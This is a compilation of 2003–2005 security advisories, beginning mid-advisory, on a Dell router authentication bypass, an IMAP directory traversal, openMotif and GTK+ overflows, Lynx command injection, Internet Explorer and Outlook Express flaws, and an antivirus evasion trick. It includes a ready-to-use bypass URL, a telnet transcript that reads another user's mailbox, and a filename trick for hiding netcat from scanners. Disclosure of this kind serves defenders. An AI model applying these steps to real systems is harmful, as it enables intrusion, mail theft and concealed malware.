vulnerability research http://www.iDefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.iDefense.com X. LEGAL NOTICES Copyright © 2005 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 12.07.05: Dell TrueMobile 2300 Wireless Broadband Router Authentication Bypass Vulnerability
Dell TrueMobile 2300 Wireless Broadband Router Authentication Bypass Vulnerability iDefense Security Advisory 12.07.05 www.idefense.com/application/poi/display?id=348&type=vulnerabilities December 7, 2005 I. BACKGROUND The Dell TrueMobile 2300 Wireless Broadband Router is an 802.11b/g wireless access point, wired ethernet switch and internet router. More information can be found at the following URL: http://support.dell.com/support/edocs/network/p57205/en/intro/index.htm II. DESCRIPTION Remote exploitation of a design error in Dell Inc.'s TrueMobile 2300 Wireless Router may allow an attacker to reset the authentication credentials. The Dell TrueMobile 2300 is a wireless router and access point. By requesting the following url from the router, it is possible to obtain a page containing a form which allows you to reset the authentication credentials. (The IP is typically 192.168.2.1, and [ROUTER IP] should be replace by the router's actual address.) http://[ROUTER IP]/apply.cgi?Page=adv_password.asp&action=ClearLog Although dialog boxes for entering the username and password appear, pressing cancel will not prevent this exploit from working. III. ANALYSIS Exploitation could allow remote attackers to associate with the internal side of the router to change any configuration settings, including uploading of new firmware. The precise cause of the error is unknown. Although there is GPL source code available for this product, the firmware's source code version has not been kept up to date with the binary version. As a result, it does not directly allow the cause of the vulnerability to be determined. Based on analysis of the affected binary, /usr/sbin/httpd, and the previous version of the source code it appears the cause is a logic error involving the 'ClearLog' string being checked without first ascertaining that the page was one where that made sense. Although the binary appears to be largely the same code as the available source code, there are many differences. In the binary version, the authentication is not performed in the same order as in the source version. It is likely that the determination of which pages to check is now done on the basis of the 'action' variable, rather than the previous method of using the page name. IV. DETECTION iDefense has confirmed the existence of this vulnerability in the following Dell TrueMobile 2300 firmware versions: • 3.0.0.8, dated 07/24/2003 • 5.1.1.6, dated 1/31/2004 Previous versions of this may also be affected, however it is not clear in which version the vulnerability was introduced. V. WORKAROUND In order to mitigate exposure to this vulnerability from remote attackers, employ encryption on your wireless interface, or disable it if it is not required. The exact settings to use are dependant on your wireless security policy. This workaround does not prevent exploitation from the local network via wired interfaces. VI. VENDOR RESPONSE "The vendor is no longer selling this product and has replaced it with newer models that do not exhibit the defect. Therefore, a patch will not be released to address this issue." VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3661 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/17/2005 Initial vendor notification 11/18/2005 Initial vendor response 12/07/2005 Public disclosure IX. CREDIT TNull is credited with the discovery of this vulnerability. Get paid for vulnerability research http://www.iDefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.iDefense.com X. LEGAL NOTICES Copyright © 2005 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[xfocus-SD-051202]openMotif libUil Multiple vulnerability
Title: [xfocus-SD-051202]openMotif-libUil-Multiple_vulnerability
Affected version : openmotif 2.2.3(not got 2.2.4,so not test in
openmotif 2.2.4)
Product: http://www.motifzone.net/
xfocus (http://www.xfocus.org) have discovered multiple vulnerability in
openmotif libUil library. details following:
1: libUil.so diag_issue_diagnostic buffer overflow
Clients/uil/UilDiags.c
diag_issue_diagnostic()
202 voiddiag_issue_diagnostic
203 ( int d_message_number, src_source_record_type
*az_src_rec,
204 int l_start_column, ...)
205
206 {
207 va_list ap; /* ptr to variable
length parameter */
208 int severity; /* severity of message */
209 int message_number; /* message number */
210 charmsg_buffer[132];/* buffer to construct
message */
211 charptr_buffer[buf_size]; /* buffer to construct
pointer */
212 charloc_buffer[132];/* buffer to construct
location */
213 charsrc_buffer[buf_size]; /* buffer to hold source
line */
..
293 va_start(ap, l_start_column);
294
295 #ifndef NO_MESSAGE_CATALOG
296[1.1] vsprintf( msg_buffer,
297 catgets(uil_catd, UIL_SET1, msg_cat_table[
message_number ],
298 diag_rz_msg_table[ message_number ].ac_text),
299 ap );
300 #else
301[1.2] vsprintf( msg_buffer,
302 diag_rz_msg_table[ message_number ].ac_text,
303 ap );
304 #endif
305 va_end(ap);
[1.1][1.2] call vsprintf will cause buffer overflow if ap is user-support
data,so if one local or remote application which used this library may
cause execute arbitrary code .
2: libUil.so open_source_file buffer voerflow
Clients/uil/UilSrcSrc.c
620 status
621 open_source_file( XmConst char *c_file_name,
622 uil_fcb_type *az_fcb,
623 src_source_buffer_type *az_source_buffer )
624 {
625
626 static unsigned short main_dir_len = 0;
627 boolean main_file;
628 int i; /* loop index through
include files */
629 charbuffer[256];
630
631
632 /* place the file name in the expanded_name buffer */
633
634[2.1] strcpy(buffer, c_file_name);
635
636 /*Determine if this is the main file or an include file. */
637
638 main_file = (main_fcb == NULL);
639
[2.1] like above
--EOF
iDEFENSE Security Advisory 11.17.05: Qualcomm WorldMail IMAP Server Directory Traversal Vulnerability
Qualcomm WorldMail IMAP Server Directory Traversal Vulnerability
iDEFENSE Security Advisory 11.17.05
www.idefense.com/application/poi/display?id=341&type=vulnerabilities
November 17, 2005
I. BACKGROUND
Qualcomm WorldMail is an email and messaging server designed for use
in small to large enterprises that supports IMAP, POP3, SMTP, and web
mail features.
More information can be found on the vendors site:
http://www.eudora.com/worldmail/
II. DESCRIPTION
Remote exploitation of a directory transversal vulnerability in Qualcomm
WorldMail IMAP Server allows attackers to read any email stored on the
system.
The IMAP protocol supports the use of multiple folders and contains
commands with allow users to specify specific paths. Qualcomm WorldMail
server allows multiple commands to specify folders outside of the
current user's mailbox.
Attackers can leverage this vulnerability to view and manage any other
user's email messages stored on the system. Attackers also have the
ability to move any arbitrary folder on the system.
Exploitation is trivial and can be done with a simple telnet client.
Below is an example transaction highlighting the attack:
---
c:\> telnet 192.168.0.109 143
* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed
2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox
2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox
2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}
this message was sent to administrator
III. ANALYSIS
Successful exploitation of this vulnerability allows attackers to view
and delete mail from any user on the system. Attackers may also be able
to affect system stability with the ability to move arbitrary folders on
the affected system.
This is a post authentication exploit. In order to exploit this
vulnerability an attacker would need a valid login to the email server
and the IMAP module would have to be enabled (default).
IV. DETECTION
This exploit was tested against Qualcomm Worldmail server version 3.0.
Other versions may be vulnerable.
V. WORKAROUND
As the affected commands cannot be disabled, it is important that only
trusted users be allowed to access the vulnerable mail server.
Exploitation of this vulnerability can only be done after a user is
authenticated to the mail server. Therefore, it is recommended that
login credentials be reviewed to ensure that only trusted users have
access.
WorldMail also supports POP access to email. If disabling the IMAP
service completly is an option, this will also prevent exploitation of
the vulnerability.
VI. VENDOR RESPONSE
Multiple attempts have been made to inform the vendor of this
vulnerability but to date a response has not yet been received.
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3189 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
10/12/2005 Initial vendor notification
10/27/2005 Initial vendor response
11/17/2005 Public disclosure
IX. CREDIT
The vulnerability was discovered by FistFuXXer.
Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp
Free tools, research and upcoming events
http://labs.idefense.com
X. LEGAL NOTICES
Copyright © 2005 iDEFENSE, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
iDEFENSE Security Advisory 11.15.05: Multiple Vendor Insecure Call to CreateProcess() Vulnerability
ing into the problem, and it seems that this is not present in the current version of KAV for File Servers." Microsoft: "Microsoft has confirmed that the Beta 2 version of its Antispyware product, targeted for release later this year, will address the issue reported by iDEFENSE." VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to this issue. RealNetworks RealPlayer 10.5 CAN-2005-2936 Kaspersky Anti-Virus 5.0 CAN-2005-2937 Apple iTunes 4.7.1.30 CAN-2005-2938 VMWare Workstation 5.0.0 build-13124 CAN-2005-2939 Microsoft Antispyware 1.0.509 (Beta 1) CAN-2005-2940 Theses are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/19/2005 Initial vendor notification 11/15/2005 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2005 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDEFENSE Security Advisory 11.15.05: Multiple Vendor GTK+ gdk-pixbuf XPM Loader Heap Overflow Vulnerability
Multiple Vendor GTK+ gdk-pixbuf XPM Loader Heap Overflow Vulnerability
iDEFENSE Security Advisory 11.15.05
www.idefense.com/application/poi/display?id=339&type=vulnerabilities
November 15, 2005
I. BACKGROUND
GTK+ is a multi-platform toolkit for creating graphical user interfaces.
Offering a complete set of widgets, GTK+ is suitable for projects
ranging from small one-off projects to complete application suites.
II. DESCRIPTION
Remote exploitation of heap overflow vulnerability in various vendors'
implementations of the GTK+ gdk-pixbuf XPM image rendering library could
allow for arbitrary code execution.
The vulnerability specifically exists due to an integer overflow while
processing XPM files. The following code snippet illustrates the
vulnerability:
if (n_col <= 0 || n_col >= G_MAXINT / (cpp + 1)) {
g_set_error (error,
GDK_PIXBUF_ERROR,
GDK_PIXBUF_ERROR_CORRUPT_IMAGE,
_("XPM file has invalid number of colors"));
return NULL;
}
[...]
colors = (XPMColor *) g_try_malloc ((sizeof (XPMColor) * n_col));
[...]
The validity check of n_col is enough to prevent an integer overflow in
the first g_try_malloc, however there is not a proper check for the
second g_try_malloc, which allows an undersized heap buffer to be
allocated, then overflowed while using n_col as an upper bounds in a
copying loop. This can be used to execute arbitrary code via traditional
heap overflow 4 byte write methods or by overwriting adjacent areas of
the heap with important values such as function pointers.
III. ANALYSIS
Exploitation could allow for arbitrary code execution in the context of
the user running the affected application. As this library is used in a
variety of applications, this vulnerability could be exploited either
remotely, via a networked application or locally.
IV. DETECTION
iDEFENSE has confirmed the existence of this vulnerability in gtk+ 2.4.0
compiled from source. It is suspected that previous versions are also
affected by this vulnerability. The following vendors include
susceptible GTK+ and GdkPixBuf packages within their respective
operating system distributions:
The Debian Project:
Debian GNU/Linux 3.0 and 3.1 (all architectures)
Mandriva (formerly Mandrakesoft):
Mandriva Linux (formerly Mandrakelinux) 10.0 and 10.1,
Corporate Server 3.0
Novell Inc.:
SuSE Linux 8.2, 9.0, 9.1 and 9.2
Red Hat Inc.:
Red Hat Enterprise Linux 2.1, 3, 4,
Fedora Core 3, 4
V. WORKAROUND
Users should not open untrusted media files.
VI. VENDOR RESPONSE
Red Hat Inc.:
"This issue affects the gtk2 packages as shipped with Red Hat Enterprise
Linux 3 and 4, and the gdk-pixbuf packages as shipped with Red Hat
Enterprise Linux 2.1, 3, and 4. Updates to these packages are available
at the URL below or by using the Red Hat Network up2date tool.
http://rhn.redhat.com/errata/CVE-2005-3186.html
This issue affects the gtk2 and gdk-pixbuf packages as shipped with
Fedora Core 3 and 4."
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3186 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
10/12/2005 Initial vendor notification
10/14/2005 Initial vendor response
11/15/2005 Coordinated public disclosure
IX. CREDIT
infamous41md is credited with the discovery of this vulnerability.
Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp
Free tools, research and upcoming events
http://labs.idefense.com
X. LEGAL NOTICES
Copyright © 2005 iDEFENSE, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
[xfocus-AD-051115]Multiple antivirus failed to scan malicous filename bypass vulnerability
[xfocus-AD-051115]Multiple antivirus failed to scan malicous filename bypass vulnerability discoverer by [EMAIL PROTECTED] class: design error Threat level: medium Vulnerable anti-virus Engine: Kaspersky Antivirus Symantec AntiVirus F-Prot Antivirus ClamWin Antivirus Avast Antivirus RAV AntiVirus Microsoft AntiSpyware tested anti-virus vendor: Symantec AntiVirus Corporate 8.0 Kaspersky Antivirus Personal Pro 4.5.0.104 Kaspersky Antivirus For MS NTServer 4.5.0.104 F-Prot Antivirus 3.16c ClamWin Antivirus 0.87 Avast.Professional.Edition.v4.6.603 RAV.AntiVirus.Desktop.v8.6 Microsoft AntiSpyware beta1 1.Summary: Windows system may use the many kinds of special mark as filename, some anti-virus engines are unable to analyze the special structure document filename, thus failed to file operate. 2. Detail: Demonstration here: Choose a malicious file which would be detected, such as nc.exe, rename the file as nc??.exe (?? =Hex C0 D7 BA DC) Then these malicious files will be not detected by antivirus scan. Because these special names are unable directly to input, so if you want to run these file, you should use the following way: [EMAIL PROTECTED]:\Vul\bugtrap]#dir /x 1998-01-03 14:3759,392 NC294E~1.EXE nc??.exe [EMAIL PROTECTED]:\Vul\bugtrap]#NC294E~1.EXE -help [v1.10 NT] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [options] [hostname] [port] options: Uses the MS-DOS name specification, we can operate file with Open、 Read、Write、 and duplicate。 In fact the most vendor all have the problem in regarding this king of file parse: For instance use the right key clicks these kinds of file, will be no scan option menu to show by Kaspersky antivirus, and Symantec AntiVirus Corporate V10.0.1.1000 will detected but can't remove it. AVG Anti-Virus will be passed by normally path scan mothod, but can't read the file if click the scan option menu. 3. Credits: Thank [EMAIL PROTECTED] translate it, thx all members of xfocus team and all support xfocus team. 4. About xfocus: Xfocus is a non-profit and free technology organization which was founded in 1998 in China. We are devoting to research and demonstration of weaknesses related to network services and communication security. homepage http://www.xfocus.org/ -EOF -- Kind Regards, --- [EMAIL PROTECTED] XFOCUS Security Team http://www.xfocus.org
iDefense Security Advisory 11.11.05: Multiple Vendor Lynx Command Injection Vulnerability
Multiple Vendor Lynx Command Injection Vulnerability iDefense Security Advisory 11.11.05 www.idefense.com/application/poi/display?id=338&type=vulnerabilities November 11, 2005 I. BACKGROUND Lynx is a fully-featured WWW client for users running cursor- addressable, character-cell display devices such as vt100 terminals and terminal emulators. Lynx support a number of protocols including HTTP, HTTPS, gopher, FTP, WAIS, NNTP, finger or cso/ph/qi servers, and services accessible via logons to telnet, tn3270 or rlogin accounts. II. DESCRIPTION Remote exploitation of a command injection vulnerability in various vendors' implementations of Lynx could allow attackers to execute arbitrary commands with the privileges of the underlying user. The problem specifically exists within the feature to execute local cgi-bin programs via the "lynxcgi:" URI handler. The handler is generally intended to be restricted to a specific directory or program(s). However, due to a configuration error on multiple platforms, the default settings allow for arbitrary websites to specify commands to run as the user running Lynx. III. ANALYSIS Successful exploitation of the described vulnerability allows remote attackers to execute arbitrary commands with the privileges of the underlying user. Exploitation requires that an attacker convince a target user to follow a malicious link from within a vulnerable version of Lynx. The "lynxexec" and "lynxprog" URI handlers can also be used to trigger the issue. However, they are rarely compiled into the Lynx binary. IV. DETECTION iDEFENSE has confirmed the existence of this vulnerability in the latest stable release of Lynx, version 2.8.5. It is suspected that earlier versions are also affected. The following vendors include susceptible Lynx packages within their respective distributions: * Red Hat Inc. * Gentoo Foundation Inc. * Mandriva SA Other vendors are suspected as also being vulnerable. The following vendors include Lynx packages that are not susceptible to exploitation as the "lynxcgi" feature is not compiled into Lynx by default: * The FreeBSD Project * OpenBSD V. WORKAROUND Disable "lynxcgi" links by specifying the following directive in lynx.cfg: TRUSTED_LYNXCGI:none VI. VENDOR RESPONSE Development version 2.8.6dev.15 has been released to address this issue and is available from the following URLs: http://lynx.isc.org/current/lynx2.8.6dev.15.tar.Z http://lynx.isc.org/current/lynx2.8.6dev.15.tar.bz2 http://lynx.isc.org/current/lynx2.8.6dev.15.tar.gz http://lynx.isc.org/current/lynx2.8.6dev.15.zip Alternately, an incremental patch is available at: http://lynx.isc.org/current/2.8.6dev.15.patch.gz VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-2929 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 10/27/2005 Initial vendor notification 10/28/2005 Initial vendor response 11/11/2005 Public disclosure IX. CREDIT vade79 (http://fakehalo.us) is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2005 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
TEXT/PLAIN: ALERT("OUTLOOK EXPRESS")
Friday, July 25, 2003 Active Scripting and HTML in a plain text mail message: MIME-Version: 1.0 Content-Type: text/plain; Content-Transfer-Encoding: 7bit X-Source: 25.07.03 http://www.malware.com foo The above is a legitimate RFC822 mail message in plain text. Ordinarily one would require an html mail message [Content-Type: text/html;] to parse html and scripting. The above functions under a plain text mail message in Outlook Express 6.00 and Outlook Express 5.5 [perhaps others]. Outlook Exprss 6 has restricted zone as default as well as an option to read messages in plain text [use it !]. Other versions do not. This was definitely fixed way back when: [see: http://www.securityfocus.com/bid/3334 ] And now appears to be back. It can be of interest to admins who filter based on content type at the gateway, as well as newsgroup operators who do the same [less so as comprehensive]. Notes: 1. We're working on html in the 'plain text' zone of OE6 next. 2. None. End Call -- http://www.malware.com
Drivial Pursuit: Internet Explorer Browser & Your Files and Folders !
Wednesday, 23 July, 2003 Yet another quaint lead-up to "silent delivery and installation of an executable on a target computer. No client input other than viewing a web page" ! This is getting boring. A myriad of technical hurdles have been recently placed to disallow access to files and folders on the local machine from the internet. Previously simple redirects could defeat that, but that too has been eliminated. Coupled with a myriad of existing possibilities of placing arbitrary files in known locations on the local machine, along with perhaps several other well known applications that create sensitive files in known locations on the local machine, accessing all of these with our trusty browser commonly known as IE, leaves us with ample opportunity to wreak further havoc on the unsuspecting customers of the manufacturer, one "Microsoft". For an ever increasing list of component possibilities seek here: http://www.pivx.com/larholm/unpatched/ Once again the problem lies within our trusty and battle-hardened Windows Media Player. Two second creation of Zero second URL flip to local machine, allows us the desired access. Whether this is the result of a 'trusted' media file or not is unclear. Not important. Custom crafted media files seem to fail. Working Example: Fails on WMP 9 but fully functional on all others regardless of operating system: ATTENTION: demo is merely first step. Plug 'n Play any of the available components in the listing above for maximum results: http://www.malware.com/once.again!.html Notes: 1. We appear to be going around and around in circles now 2. We see no possibility of ever expending one red cent to this particular toy manufacturer. As such we are stuck with what we have. We would be interested to thoroughly examining the latest and greatest toys created by these people and should someone feel like lending us a couple shiny new machines with default installs of the latest and greatest toys, we'll be happy come to some sort of mutualy beneficial arrangement. 3. None. -- http://www.malware.com
